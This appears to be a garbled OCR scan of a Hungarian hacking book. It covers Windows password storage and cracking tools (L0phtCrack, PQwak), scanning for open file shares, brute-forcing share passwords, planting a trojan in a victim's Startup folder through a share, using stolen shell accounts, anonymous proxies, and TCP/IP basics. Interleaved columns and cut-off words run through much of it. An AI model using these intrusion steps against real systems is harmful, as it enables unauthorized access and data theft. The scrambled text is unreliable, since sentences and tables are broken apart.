felhasználóknak pedig egyre nehezebbé teszi a jelszavak elrejtését. a felhasználó költéségén szörfözhet az interneten. 2. Erre egyszerű példák találhatók az Internet Explorernél és a telefonos kapcsolatnál. november 5. A hackerek a jelszavakat még az idevágó weboldalakon is nyilvánossá tehették .mondják. a PWL fájl nevejani. hogy hozzáférjenek ezekhez az információkhoz. 10:30 . a Microsoft nagyon megkönnyíti a betolakodóknak. . verziótól kezdve egy automatikus kiegészítést használ. a telefonos kapcsolat jelszavai és a Windows bejelentkező nevek. így tárolódnak például a meghajtók és a nyomtatók hozzáférési jelszavai. Különösen veszélyes ez a telefonos kapcsolatnál. hogy valaki. Münsterben már 3600 nyomozási eljárás lezárult.

A SAM azokat a felhasználói adatokat használja. a frissítés egy erősebb kódoló algoritmusra. a jelszavak rendszeres változtatását és a karakterek sokszínűségét. a Windowshoz sok jelszófeltörő van. Ez a kulcs megakadályozza a megadott jelszavak tárolását. illetve feltörését. Az RC4 egy szimmetrikus kódolási eljárás. A szimmetrikus kódolás előnye mindenekelőtt a kódolás nagy sebessége. amelyeket a winnt/ system32/config/sam fájl tárol. amelyek lehetővé teszik a célszámítógép valamennyi jelszavának azonnali kiolvasását. Mindegy. hogy a jelszófeltörők elérjék a PWL fájlokat. s egyfajta „jogosultsági igazolványt" kap. amelyek a tulajdonképpeni jelszavakat tartalmazzák. amelyeket ugyan továbbra is számos segédprogrammal fel lehetett törni. és az. Sajnos ezt a kódot a megfelelő eszközzel másodpercek alatt fel lehet törni. hogy ott zavartalanul és időkorlát nélkül kikódolhassák. Van egy program is. fájloknál azonban sok idő kell a jelszavak kiolvasásához. Jelszófeltörők Mint már említettük. Ezzel a kóddal és az RC4 algoritmus egy változatával kódolják az adatokat a PWL fájlokban. A következő verziókban már olyan kódolási technikákat használtak. A PassSecure a Multimedia Network Systemstől meggátolja. a Windows 95/98/ME alatt lehetőség van a HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion \Policies\Network \DisabledPwdCaching = 1 Registry-kulcs létrehozására. Ha Windows 2000 alatt bejelentkezik egy felhasználó. A Windows valamennyi jelszót egy SAM (Security Account Manager)adatbázisban tárol.asp oldalon juthatunk hozzá. 2. valamint a fájl létrejöttének a dátumát. A feladó egy kulccsal kódolja az átvitelre szánt adatokat. mindez azonban már sokkal több időbe telt. Továbbra is ajánlatos azonban. amely megakadályozza a jelszavak kiolvasását.3 Jelszavak a Windows 2000 alatt A Windows 2000 alatt egészen más a jelszavak kezelése. Ez a Windows jelszó mellett a hálózati jelszót is őrzi. mivel a Windows állandóan használja. microsoft.com/support/kb/artícles/Q132/8/07. Ilyenkor a hackerek gyakran lemezre menük a PWL fájlokat. illetve kiolvasását. Ezeknek az adatoknak az alapján a Windows 2000 ki tudja számítani a jelszavak biztonsági kockázatát. amelyben rögzítve vannak a hozzáférési jogai. az adatai a Security Account Manager-hez továbbítódnak.csak ellenkező irányban. amelynél mindkét kommunikációs partner ugyanazt teszi . a fogadó pedig ugyanezzel a kóddal fejti meg az üzenetet. ami viszonylag egyszerűvé tette a hackereknek ezek megfejtését. Védelmi lehetőségek Hogy a jelszófeltörő programoktól megvédhessük magunkat.A kódolás A Microsoft a Windows 95 első verzióiban nem nagyon strapálta magát a kódolás algoritmusával. hogy a jelszó hosszabb vagy rövidebb 32 bitnél. ez az adatbázis a Registry része. A nagyobb PWL A számokból és betűkből álló kombinációk a jelszófeltőrőket is megizzasztják . és szükség esetén figyelmezteti a felhasználót. ráadásul a trójaiakba is gyakran integrálnak olyan programokat. és ezzel lehetetlenné teszi a kiolvasásukat is. amelyek lehetővé teszik a Windows jelszavak kikódolását. Hátrányként jelenik meg a kódkicserélés problémája és a ráfordításigényes kódnyilvántartás.2. hogy az eljárást könnyű implementálni. Egy PWL fájl tartalmaz egy header-t. Ezt a fájlt nem lehet közvetlenül elérni. ehhez számtalan eszköz áll a hackerek rendelkezésére a hálón. továbbá úgynevezett rekordokat is tárol. A felhasználói névből és a jelszóból a Windows 9x egy 32 bit hosszúságii kódot generál. Ehhez az update-hez a http://support. mint a Windows 95/98/ME alatt. és hogy melyik felhasználói csoporthoz tartozik. amelyeket egy másik számítógépre másolhatnak. A Windows 2000 automatikusan ellenőrzi a jelszavak biztonságosságát. A Windows 2000 ellenőrzi minden jelszó hosszát. főleg a Windows 95 felhasználóknak. a kód mindig ilyen hosszú. s automatikusan figyelmeztet az általános jelszóbiztonság elleni vétségekre.

amelyet nem veszünk észre 2. például a rendszer hálózatra csatlakoztatása miatt. hogy mennyire könnyelműen mozognak egyesek a hálón. az xDSL és a flatrate-ek korában. Ez a program úgy kerüli ki a hozzáférési védelmet. elég idejük van a hackereknek arra. hogy a háttérben egyfajta másolatot készít a SAM-fájlról. Azonban a strandard konfigurációt gyakran meg kell változtatni.és nyomtatómegosztás veszélyes biztonsági rések A fájl. hogy kitalálja a jelszót. Az egyik legismertebb közülük a legendás LOphtCrack 2. méghozzá minden jelszóvédelem nélkül.3. ahol minden lehetséges szám és/vagy szókombinációt kipróbál.1 A fájl. amikor a felhasználók rendszerei gyakran folyamatosan kapcsolódnak az internethez.) Itt egy kockázati tényező rejtőzik. hogyan lehet felderíteni az ilyen megosztott erőforrásokat. ugyanakkor újra bebizonyítják. így például a rendszer különböző réseinek a szkennelését. 2.3 A távoli elérésű támadás . hogy lehetővé tegyék a felhasználóknak a mappák vagy az adathordozók elérését a hálózaton.5. Ebből a fejezetből kiderül.tolvajkulcs a Windows 2000 jelszavakhoz A LOphtCrack kétféleképpen tud jelszavakat feltörni. főleg attól függ. Az első módszer a dictionary cracking. egyedüli PC-ként és trójai nélkül. Ráadásul az ISDN. a megosztás a magánemberek számára is a biztonságot meghatározó témává vált. hogy milyen veszélyeknek teszik ki az adataikat az internethez kapcsolódással. (A jelszófeltörés témáját a 7.és nyomtatómegosztást tulajdonképpen arra használják. hogy milyen megosztásokat használ a felhasználó. amelyet a hackerek okoznak.internetvagy hálózati felhasználók. A könyvhöz végzett kutatások során valóban találtunk olyan rendszereket. A kár. fejezet részletesen újratárgyalja. A második a brute force cracking. vigyázat! Egyet világosan kell látni: egy távolból jövő támadás egy Windows 95/98/ME rendszer ellen. szabvány konfigurációban. hogy továbbra is használni tudja a régi PC-jét. . Mióta egyre több felhasználó épít ki otthon is kis hálózatocskát.Időközben azonban számos Brute Force program is íródott.5 . zók minden védelem nélküli megosztása vagy a slamposan megadott jelszavak gyakran szélesre tárják a kaput a betolakodók előtt. valóban nehéz. amelyek az NT és a Windows 2000 alatt is lehetővé teszik jelszavak hackelését. amelynél gyakran használt jelszavak és karakterek listáját használja. amelyeknek a felhasználói minden meghajtót megosztottak. vagy hogy időnként csatlakoztatni tudjon egy notebookot. hogy a cél érdekében számtalan támadási módot kipróbáljanak. Az adathordo- E szolgáltatások felhasználói általában nincsenek tisztában azzal. Az ilyen esetek természetesen durva gondatlanságról tanúskodnak. LOphtCrack 2.

hackerzbook. a Rhino9 szerzeménye. Nem nehéz felismerni a lehetséges kockázatokat és károkat.3. Név Auto NetBIOS Hacker Légion NAT SharesFinder URL www.de www.hackerzbook. .161. majd grafikusan megjeleníti ezeket.3. ami több szkennelést tesz szükségessé. és nem mindig találja meg azonnal a megosztott erőforrásokat. A megosztások felkutatásához elegendő a számítógép IP-területe Csak a számítógépről szállít információkat. fájlmegosztással Egy másik a Lan Guard Network Scanner. Az előnyei a Légionnal szemben a nagy megbízhatóság és a nagyon gyors szkennelés. A következő ábra a megosztott C: merevlemez tartalmát mutatja egy. hogy a jelszófeltöréshez egy másik eszközt. Kapcsolódás egy másik számítógéphez. és semmilyen támadóeszköze nincs. A szkennelés eredménye A DOS alatt a NET USE paranccsal is lehet kapcsolatot teremteni. a Légion nagyon megbízhatatlan.2 Mik azok a szkennerek. például a Légiont kell használni.2.59. például \\217.hackerzbook. ami azt jelenti.hackerzbook. Az egyik legismertebb ilyen a Légion. A Légion minden megosztást szkennel a számítógépen. UNIX/Linux Windows 9x/NT. a hálózaton keresztül elért számítógépen. Sajnos.de Operációs rendszer Windows 9x/NT/2000 Windows 9x/NT/2000.de www. és hogyan működnek? A megosztások felkutatása szkennerprogramokkal történik.de www. UNIX/Linux Windows 9x/NT/2000 Programok a megosztások felkutatásához Hozzáférés a szabad erőforrásokhoz A talált megosztott erőforrások elérése a következők szerint történik: a támadó egyszerűen beírja a talált IP-címet a Windows Intézőbe.

és a szerver elinduljon.4 Jelszóval védett megosztások A megosztott erőforrásokat természetesen jelszóval lehet védeni. Nehéz jelszavaknál ez természetesen meglehetősen értelmetlen vállalkozás. hogy milyen hozzáférési módokat adtak meg. ha kap egy hibajelzést. rendkívül hatékony is lehet. Shane Hird műhelyéből Ez az eszköz többek között a Windows 95/98 alatti fájlmegosztás egy implementációs hibáját használja ki. admin.Így lehet DOS alól elérni a másik számítógépet 2. gyakran hebehurgyán felhasznált jelszó közül. Annak megfelelően. De vannak gyakran használt szabvány jelszavak is. hogy senki se férjen hozzájuk jogosulatlanul a hálózatról vagy az internetről. amit valamikor a potenciális hacker is fel fog adni. hogy a trójai szerver része (közelebbit lásd a trójaiakról szóló fejezetben) a következő bootolás után telepítődjön.3. vagy a kedve szerint törölhet. hogy mi mindent tudnak megváltoztatni. vagy manipulálni a behatolók Persze ez a védelem a szimpla jelszavak esetén meglehetősen sovány. Az is köztudott. barátnő. de hogy a felhasználó egy trójai becsempészésére fog-e gyanakodni. amely Brute Force-rohamot intéz a NetBIOS jelszó ellen. pl. mint például gast. . hogy csak néhányat említsünk a számtalan. a szisztematikus találgatás. Egy példa arra. a fájl törlődjön. Ilyen lehet például egy program. és ezeket jelszóként végigpróbálgatja. törölni.3.3. a betolakodó másolhat. hónapnevek vagy teszt.5 Brute Porce-rohamok a megosztási jelszavak ellen A legjobb és legismertebb ilyen programok egyike a PQwak. Egy különösen kedvelt támadási mód egy trójai vírust elhelyezni a C:\WINDOWS\STARTMENÜ\PROGRAMOK\INDÍTÓPULT könyvtárban. ahol megvan a lehetősége. hogy a felhasználót személyesen is ismeri... boss. kutya nevét. hogy a felhasználók kényelemszeretetből gyakran könnyen megjegyezhető jelszavakat adnak meg. Ezt a beavatkozást esetleg észreveszik. Kezdhetné azzal. Ezzel elérhető. ami a helyi hálózaton. Ezzel megvalósíthatjuk. amit egy hacker programok segítsége nélkül is megtenne. születési adatokat. administrator. hogy végiggondolja a felhasználó minden ismert személyes adatát. vezetékneveket. 2. jelszó. keresztneveket. A legegyszerűbb védelem: jelszavak az erőforrásokhoz 2. feltölthet. ahogy neki tetszik. és több sikerrel kecsegtető módszerek után néz. amit némi tudással vagy megfelelő programmal könnyen ki lehet kerülni. az bizony kérdéses.3 Milyen lehetőségeik vannak a betolakodóknak? A megosztott mappát vagy meghajtófájlokat a megosztás módja szerint lehet elérni. Az első.

de veszélytelen . köztük a NetBIOS-t is távolítsuk el. hogy a bonyolult támadásokkal ellentétben. Aránylag kényelmetlen. illetve víruskere- . és egyre gyakrabban figyelnek oda arra. ismertebb nevükön a trójaiak segítségével. fejezet). A felhasználók magatartása különösen a médiák felvilágosító tevékenysége nyomán az utóbbi években erősen megváltozott. és aki sikert akar elérni. természetesen vannak még más támadási lehetőségek is. Az ilyen programok felhasználói ritkán gondolkodnak el cselekedetük következményeiről. ami azt jelenti. Itt újból bizonyítást nyer az alfanumerikus kombinációk erőssége. manipulálják a Registry-t.0-s verziója nincs túl gondosan programozva. hogy ne nyissák meg gondatlanul a mail-ékhez csatolt fájlokat. sok különleges karakter hiányzik. adatokat másoljanak. amelyek védik az erőforrásokat. hogy jelszavakat kémleljenek ki. és amelyekre most csak röviden szeretnénk kitérni. Ezeknek a programoknak a problematikája az egyszerűségükben rejlik. illetve a Remote Controll programok. mivel rá vannak utalva a megosztott erőforrások használatára. hogy teljesen az uralmuk alá hajtsanak rendszereket.4 További támadási technikák A bemutatott biztonsági réseken kívül. és kiindulhatunk abból. Továbbá minden szükségtelen protokollt.betörés a hátsó ajtón keresztül Nagyon elterjedtek a támadások a hátsó ajtók. itt semmiféle háttértudás megszerzésével nem kell foglalkozni. Egyre jobban elterjednek a trójai-. A trójaiak a felépítésüknél fogva kitűnően alkalmasak arra.Előkészület a célzott támadásra Ez a megoldás azonban sok felhasználó számára szóba sem jöhet. Mind gyakrabban használnak tűzfalakat.6 Óvintézkedések A legegyszerűbb. és ennek megfelelő agresszivitással támadnak áldozataik rendszereire. 2. hogy egy bizonyos idő múlva a még oly türelmes hacker is feladja.3. eljárásokat indítsanak vagy fejezzenek be. Ez ugyan nem kínál százszázalékos védelmet.és nyomtatómegosztás megszüntetése a hálózati környezet beállításainál. ha védekezni akarunk az ilyen támadások ellen: a fájl. Szerverkörnyezetekben a rendszeradminisztrátor beállíthatja a jelszavak erősségét és futási idejét. amit tehetünk. amelyek az operációs rendszer felépítésében gyökereznek. amelyek külön fejezetet kaptak a könyvben (lásd 4. amelyek megakadályozzák a trójai szerver kapcsolódását a klienshez. Ez különösen a „szabadidős hackereknek" nyújt lehetőséget arra. annak gyakran kell újraindítania. A PQwak l . amelyeket most csak bemutatunk. és megosztásokat hozzanak létre. A PQwak minden karaktert és különleges karaktert felismer. így azután a legrövidebb idő alatt szinte minden jelszót fel lehet vele törni. A PQwaknak egyszerűen meg kell adni annak a számítógépnek az IP-jét. de jelentősen megnehezíti a betörést. 2. Tulajdonképpen csak erős jelszavak jöhetnek számításba.megszüntetjük a megosztásokat Trójaiak . illetve töröljenek. amelynek a jelszavait fel kell törnie.

ső programok is. amelyek vállalati hálózatokban működtek. . De még mindig elég sok felhasználó van. illetve megfelelő figyelmeztetésekkel megakadályozni a telepítésüket. és fütyülve minden figyelmeztetésre. de a rendszergazdák valószínűleg csak a káresetekből fognak tanulni. A gyakorlatból ismerünk olyan eseteket. ismeretlen és komolytalan forrásból származó fájlokat nyitnak meg. Ez a magatartás durván felelőtlen. mikor már régóta ismert trójaiak. mint a Sub7 vagy a BackOrifice (pontosabbat ezekről a programokról a trójaiakról szóló fejezetben) települtek olyan számítógépekre. akikben nem tudatosultak ezek a veszélyek. A védekezés és a felismerés lehetőségeivel ugyancsak a trójaiakról szóló fejezetben foglalkozunk. amelyek képesek észlelni és eltávolítani a szerveralkalmazásokat a rendszerben.

.3......2 ...3.2 Az FTP 3..........1 A Telnet 3.2.. A TCP/IP 3..1 Az anonim internetezés csökkenti a kockázatot .....3 Néhány alkalmazás és protokoll használata és a biztonságosságuk .... 3....2.Tartalom 3....4 A portokról ..........3.. Névtelenül 3...1 A legtöbb felhasználó sokat elárul3....4 Az IP-címzés 3.3..... 3........3..... fejezet ...1.2..1 Mi a TCP/IP? 3..3. Az IRC 3..2 Különböző protokollok a rétegekben 3.1....

hogy megakadályozzuk saját IP-címünk átadását jobb megértés kedvéért képzeljük el egyszer az IP-címet a követggésben: egy potencionális betörőnek . stratégiáiról és őségeiről. egy emelettel és lakásszámmal együtt tacímhez hasonlít. ICQ vendégkönyvekben és a nyílt fórumokon. amelyek alapján hackerek figyelhetnek fel ránk. a ek URL-jét. igen jó rálátás kíetkörülményeinkre és a szokásainkra. A „normál" és az anonim szörfözés közötti kü http://privacy.tudnia kell a pontos címet. akkor ID-vel együtt lehet tárolni. és a nézőnek egyáltalán nem tűnik fel. illetve a házunk gyenge pontjait. szörfözés célja. E mmi sem történhet. A kis web-bugokról van szó. személyes adatokat adunk meg. nagyon pontos címzés. min csak ebből semmit nem lehet észrevenni. suk a legfontosabbakat a névtelen szörfözésről . mivel egészen k átadja egy szervernek az IP-címet. amit az anonim szörfözésnél el kell titk tuális IP-cím. amelyek lehetővé tesznek bizonyos tákat.mert egy hacker nem jeC-nk szempontjából . és gyakorlatilag úgy működik. Ha egy o tartalmaz ilyen „bogárkát".ok don szörfözünk a neten. a b valamint egy korábban elhelyezett cookie információit.a PC-nk nyitott portjához hasonlóan . Az IP-cim minden alkalommal átmegy az adatokkal együtt. Mindenhol h nyomokat. Ez den bemutatja a legfontosabb információkat. a felkeresett oldal URL-jét. Csak ezután á.net/anonymizer oldal teszi világossá.kockázattá.1 A legtöbb felhasználó sokat elárul e többet megtudni a hackerek tevékenységéről. és ez gük lesz pontosan kideríteni az identitásunkat. ha „normál" mó- Egy szituáció. Csak ennek az adatnak az ismeretében válik a aablak . de amint ez ismertté válik. amelyek a „hacker és egyben a védekezés alapismeretei közé is tartoznak. amelyben öntudatlanul is feladjuk az anonimit valószínűleg a legkevésbé tűnt fel. Mindkettő hasonlít a talán már ismert cookie-khoz. amint az a lenti példából is lá könnyen követni lehet az IP-címek segítségével. Aki csak általában akar a hackerek tevékenységéről tájékozt a fejezetet természetesen nem kell elolvasnia. Így némi erhető a technikákba is. amikor a web-bugot megnézték. és esetleg károkat nekünk.hiszen a névjegym osztogatjuk mindenütt. Ennek a fejezetnek az első része azt is milyen információkat kaphatnak rólunk mások. a m IRC. GIF-ekről. Ezzel akkor kell foglalkozdünk a háló kémlelésének. annak az internet alapjaival is közelebbi ismeretségbe Különben bizonyos támadási lehetőségek aligha követhetőek. . A parányi GIF-képecske (egy pixel méretű). Így viszont sok emenően érthetetlen marad. hogy kiderítse a lakásunk. amely valahol a webo tegrálva. arról természetesen szintén itt olvas 3. az időpontot. Hogy ezeknek a részleteknek a nyilvános hogyan akadályozhatjuk meg.1. amelyet minden számítógép az internetre lépéskor k Az interneten megtett utat. anonim internetezés csökkenti a ckázatot et az anonim szörfözésnek szenteltük. és kikapcsolni sem lehet Tehát a legfontosabb.

Hogy hetséges. mint a teljes útvonal is felismerhető.7 [en] (X11. azt mindjárt kiderül. ha minden protokoll Az aktuális proxy-szerverekről és csatlakozásaikról a cyberarmy. Ha ezt az oldalt most egy anonymizeren keresztül keressük fel. vagy legalábbis néhány közülük hatóvá válik idegenek számára: Talán már a fentiekből is világossá válhat. Magunk is beszerezhetünk egy proxy-programot vagy egy ul a http://proxys4all. egy mási milyet se mutassunk. és lehetőség szerint minden egyéb adatunka Egy előzetes megjegyzés: a saját IP-címünk egy internet-sz resztül történő szörfözéskor rendszerint dinamikus. hogy milyen operációs rendszer melyik verzióját uk. és a hostnak a proxy IP-t.com/lists/proxy/ címen találunk listát. Ebből a rövidítésből g az is kiderül. fent nevezett információt. ahogy az előbb már említettük.1. hogy csak (!) a proxy-szerverrel van ben. Hogy mo konfiguráljuk a böngészőnket. (ezek egy táblát akasztanak ránk. mint a JavaScript és hasonlók). amelyről erre az oldalra mentünk.12-t egy Intel PC-n. és nem a din IP-t mutatják.co kezdőknek kicsit nehezebb ennek a szoftvernek a telepíté szont kedvezőbbek a lehetőségek.2.com. Az IP-cím és az útvonal mellett előfordulhat. Tehát a proxy képviseli a számítógépünket.12 i686) a Netscape-hez (angol verzió).de vagy a klassziku anonymizer. Íme. l URL-je. Mostanában a Junkb jött divatba (közelebbi információk a www. hogy: „Megint itt vagyok!") az interneten. 3. vagy talmakon keresztül. a kliens és a hos vannak kapcsolva. másik IP-t oszt ki . idítés a használt webböngészőhöz. Ehhez egy kis m proxyk. például Mozilla/4. mert egyéni igények szer ható. gésző az e-mail-címeket és/vagy a login neveket is továbbítja. néhány ezek közül: ez tartozó domain név. Egy másik egyszerű módszer egy anonim proxy-szerveren figurálni a saját böngészőnk kapcsolatát. csak a szerver címét és a por gésző Internet-beállításainál (legjobb. mint minden más. Vanna keresőgépek is és hasonlók. Így például le tudja nyomni a weboldalakon található . hardverként vagy szoftverként.2 Névtelenül A cél tehát az. hogy mégiscsak m valamennyire az anonimitást az internetes szörfözéskor. és az ott tartózkodás ideje. hogy titkosítsuk a saját IP-címünket.net címről. a ho „hiszi" (az IP alapján). itt például Linux 2. ben a böngésző ismeri ezeket (az e-mail-címet a böngésző jelszó tadhatja egy anonim FTP-szerverhez való hozzáféréshez. például a http://anonsurf. csak annak a weboldalak az információi kerülnek ki.cgi.Információk az Anonymizernél Úgy az IP. hogy védekezzünk. A kliens tehát össze van kötve a hosttal. az Anon használata. amelyet a számítógép egy oldalhoz választott.2.junkbister. hogy a következő adatok mindegyike. Azon tőség is van arra. Az ilyen oldalak működési módja: az proxy-szerver többé-kevésbé szűri. 2. amelyről az oldal linkjére kattintottunk (HTTP- s A legegyszerűbb. tehát a szolg újabb betárcsázáskor egy új.de természetesen újból olvasni.

Ez a technológia először Internet Explorer 4.de címen. vagy kiköthe volítsa el a HTML-kódból a Java. user agentként.0-s verzióban jelent meg. A WWWoffle Unix/Linux rendszerek s NT alatt fut. mert megakadályozza az olvasó „zavará mtalan reklámbannerrel. Létezik ugyan egy verziója Windows 95-höz is. amelyeket a következő online kapcso- • Egy további kis anonimitási rés csak az Internet Explorer felhasz nyes: ezek az Active Channelek. azonban más háló sokra is átvihető. amelyet minden esetben ki kell y át kell engedni. ezt azonban lekapcsol Webwasher magáncélra ingyenes. hanem minden elérésnél újból felismerhet érdeklődési köre a kiválasztott channel(ek) alapján meghat Active Channel technológia a már említett cookie-k szemé használja. s ezekről üzeneteket küldenek. hogy kiszűrje a weboldalakról a nereket. ilyenkor po adhatjuk. Az oldalakat. Az eg tő veszély itt is az. latnál fog betölteni és hasonlókat. hogy milyen felhasználói névvel jelentkezzen be FTP-szerverre. n nem működik hibátlanul. amelyekre rá de még nincsenek a cache-ben. és ezek után minden jogosultságot tesztel Sok szolgáltató kínál ingyenes shell-account-okat (ezek azonb . • A proxy-knál még egy fontos szempontra kell ügyelni. majd az emre váltáskor kérésre automatikusan betölti. Tehát: ha nincs rá feltétlenül szükségünk. és így sem lehet. vagyis a anonim marad. A mi szempontunkból a WWWoffle főleg azért lehet a Junkbusterhez hasonlóan. Alapértelmezésként ez st kap. inkább kapcso • Ha egy hacker valami nagyobbat tervez. amely az anonimitásról gondoskodhat. A kommunikáció a Mixen belül kódolt. A cachen különböző kritériumok szerint közlekedhetünk. Ez a proxy elsősorban cache-elő verként működik. itt is célzottan lehet definiá headert. Az Active Channelekkel ki egyet egy webszerver-üzemeltető ajánlatából (kezdőlap). a Webwasher. Mindez a ra védelmét szolgálja.i eszköz a jelenleg csak kevesek számára elérhető Mix-System. egy w ködtetője egy JavaScripten keresztül továbbra is le tudja kér címeket. a böngészőben általában külső URLtintani vagy be kell gépelni ezeket. ezért ennek a leírásáról itt lemon akiknek egy kicsit több idejük van és Linux-pártiak. A koncepciót um eredetileg e-mail küldéshez fejlesztette. Pontosan megadhatjuk. amelyről az oldalra kattintottak. és lehetővé teszi. és nem kell ezt a véletlenre vagy a webböngé tett alapértelmezésre bízni. er Windows 95/98/NT/2000-hez és a Macintosh-hoz is meg ősorban arra szolgál. és megtalálható a w. A JavaScript utólag mégis áthúzhatja a kat. amel vagy az internetre kapcsolódás indításakor betöltődik (tehát b vagy állandó kapcsolat esetén a számítógép indításakor). hogy milyen fajta webdoku milyen HTML-kódba integrált scriptek megengedettek. a valóban a sző által elküldött sztringeket küldi el. A programot szőből lehet kezelni. Termés konfigurálható. Még ha valóban anonim proxykat is használunk. amiről sen megfeledkeznek. Sajnos a JavaScript funkciókat minden böngészőnél lehet célzottan inaktiválni. feljegyzi egy listára. Ha csak egyeden gbízhatóan működik. vagy a legutóbbi kapcsolódás során meglátoga esetleg minden oldalt.webwasher. szét és egy bizonyos idő után továbbküldi. azé az URL-é. hogy mi kerüljön a cache-be. A Webwasher. állomásból áll. E letilthatjuk a frame-ek vagy a képek letöltését. hogy nagy hálózati terheltséget Mixek még nem állnak nyilvánosan rendelkezésre. A cache-tartalmon belüli k egészítésképpen saját keresőgépet is lehet telepíteni. beleértve az online és az offline módok tást is. megadhatunk egy URL-listát. az egész rendszer megbízható. hogy a Webwashert használja. Hogy meghat mációkhoz juthassunk. kilistáztatául az összes. hogy hálózati kapcsolat ssen navigálni ebben a cache-ben.vagy a JavaScriptWWWoffle-t FTP-proxyként is lehet használni. a program lehet érdekes. csak egyes teket lehet találni. akkor beszerez mag shell-accountot. A Mix hátránya. Így nem lehet összefüg teni a bejövő és a kimenő üzenetek között. Minden Mix gyűjti a bejövő üzeneteket. hogy a csatorna előfizetője már nem anoni tokat egy szerverről. ő eszköz. A mi szempontunkból azonban inkább onságai érdekesek: a Webwasherrel megakadályozható a erer küldése. az animált képeket és a pop-up menüket.

, vagy vannak hackeroldalak, amelyeken frissen feltört accountin-ek vannak, amelyeket használni lehet.

ackerek többnyire olyan rendszereket használnak platformként dszerek megtámadásához, amelyeket már a hatalmukban tartanak, mális (legális) szörfözéshez az említett lehetőségek is teljesen ele-

Hogyan működnek a protokollok? A két protokoll, a protokollok egymásra rétegződésén, „hal stack) keresztül működik. A protocol stack az az út, amelyet az a kell tenniük ahhoz, hogy az egyik számítógépből a másikba jussa amelynek a rétegei közül a TCP/IP csak kettőt, nevezetesen a 3 használja, a következőképppen van felosztva:
Réteg Alkalmazási réteg Megjelenítő réteg Leírás

n valaki, a fenti tanácsokat megfogadva, elrejtette az IP-címét, rogram csak a proxy-szerverről gyűjthet „személyre szabott" inmivel nekünk, felhasználóknak, nem sokat árthat.

Az alkalmazási réteg képezi a csatolófelületet az alk A megjelenítő rétegben a másik számítógép rendsz

között, amelyekkel a felhasználó parancsokat küld illetve fogad egy hálózato felhasználás-specifikus formattálások történnek. Session réteg

Ez

CP/IP

gondoskodik arról, hogy az alkalmazások között megszakadt kapcsolatok helyen is folytatódjanak. Transzport réteg Ez a réteg gondoskodik a

felálljanak és - az adatvesztés megakadályozása miatt - részben ugyan

akaszban néhány protokollt szeretnénk megismertetni, amelyeket álnak. A legfontosabbak közé tartozik a Transmission Control és az Internet Protocol (IP). vetkező részben a protokolloknak azok a funkciói szerepelnek, lözhetetlenek a későbbi célokhoz, így ennek a könyvnek a hasztt közölt tudás tökéletesen elegendő. Sajnos a téma olyan kompes kifejtése messze meghaladná e könyvnek a kereteit.

adatátvitelről a két számítógép között, és gyakran csatolófelületként is szolgá alkalmazási rétegek és az alá rendelt hálózati rétegek között. Hálózati/

Ebben a rétegben folyik az optimális út (routing) keresése az kapcsolati ré (pl.: IP). Adatbiztonsági réteg réteg

adatátvitelhez. A protokollt itt már a fölé rendelt rétegektől függetlenül ki leh

Ez a réteg arról gondoskodik, hogy lehetőle

hibás átvitelek, és ha mégis lennének, akkor az adatok helyre legyenek állít illetve küldésekor.

Ez a réteg felelős a fizikai kapcsolat létrehozásáért az adato

a TCP/IP?

két hálózati protokoll neve, amelyeket az interneten és a modern használnak: az IP azonban csak két protokoll-fajta a TCP/IP protokoll-csa-

sion Control Protocol (TCP) és Internet Protocol (IP).
A TCP IP-protokollhalom rétegei az OSI-modell szerint

rotokoll-család a háló minden szolgáltatását elvégzi, ide tartozik ldése, az adatok átvitele, hozzáférés a World Wide Webhez és az tása a usenet-en keresztül.

Az adatok a számítógépből kifelé tartva az ábrázolt sorrendb resztül ezeken a rétegeken, és fordított sorrendben mennek bef szerbe. Minden réteg tud adatokat küldeni a szomszédos rét adatokat fogadni attól. Valamennyi réteg protokollokkal van öss lyek különböző szolgáltatásokat nyújtanak.

önböző protokollok a rétegekben

Parancs Chown

Leírás Egy egyszerű szövegszerkesztő.

lán valamivel érthetőbb, hogyan történik a protokollhalmon keok küldése, illetve fogadása. Most megnézzük egy kicsit közeböző rétegek legfontosabb protokolljait.

Megváltoztatja a tulajdonost és a csoportot, amelyhez eg

és/vagy egy fájl tartozik. joe

A legfontosabb Telnet-parancsok

si réteg FTP

g, amelyben a felhasználó közvetlenül egy alkalmazásba írhatja t, hogy kapcsolatot nyisson egy számítógéppel, vagy megfelelő jon ki. Fordított értelemben tehát az alkalmazási réteg az a réteg gy alkalmazás az A számítógépen a B számítógéptől is megkapait. Ebben a rétegben egész sereg protokoll van, és ezeket felülárolja semmi. Bizonyos alkalmazások itt más alkalmazásokra is en például a HP egy SNMP-re épülő programja, az OpenView. nézzük ennek a rétegnek az alkalmazásait!

A Fik Transfer Protocol egy szolgáltatás, amely minden operá belül lehetővé teszi az adatok átvitelét és azoknak a mindenkori ban mentését. Mint tudjuk, a legtöbb operációs rendszer különb tumokat használ. A Unix és a Unix-klónok gyakran NFS-t System) használnak, az OS/2 általában HPFS-t (High Performance DOS/Windows pedig kizárólag FAT-et (File Allocation Table) v Windows 2000 és az XP ezenkívül még az NTFS-t is segítség FTP-n keresztüli kommunikáció, akárcsak a Telnet, a kliens-sz épül, de valamivel komplexebb. Ebbe nem akarunk részletesebb azonban a következő pontokat megemlítjük: A kommunikáció öt fázisra osztható:
Fázis 1. fázis: Leírás

k elején még nem voltak igazi hálózatok. Voltak viszont nagygée terminálokat csatlakoztattak. Egy terminál akkoriban csak káztül tudott adatot cserélni a nagygéppel, a további terminálokkal án nem kommunikálhatott. Hogy egy újabb kábelrengeteg létesí, szoftveres megoldásra volt szükség. Így jött létre a Telnet, amely a felhasználóknak, hogy úgy tudjanak adatokat szerkeszteni stb., ülnének a másik gép shell-je (DOS promptja) előtt. A felhasznázvetlenül az alkalmazásnak kiadott paranccsal nyitott meg egy legfontosabb Telnet-parancsokat az alábbi táblázat tartalmazza.
Az aktuálisan

A kliens kérdést küld a számítógépnek, hogy a szolgáltatás

Kapcsolatfelépítés zésre áll-e, az pedig megerősítést küld, hitelesíti a felhas jelszót, és átküldi az átviteli opciókat és a fájlnev(ek)et. 2. fázis: portra vonatkozó információkat, és előkészítik a tulajdon-Adatátviteli kapadatátvitelt. Miután ezt rögzítették, elkezdődhet a tulajdon-csolat létesítése adatátvitel. 3. fázis: formában, aho-Adatátvitel gyan azt már leírtuk. 4. fázis:

Ki

Az adatátvitel az FTP-n keresztül történik, a

Leírás Létrehozza a New nevű Megváltoztatja

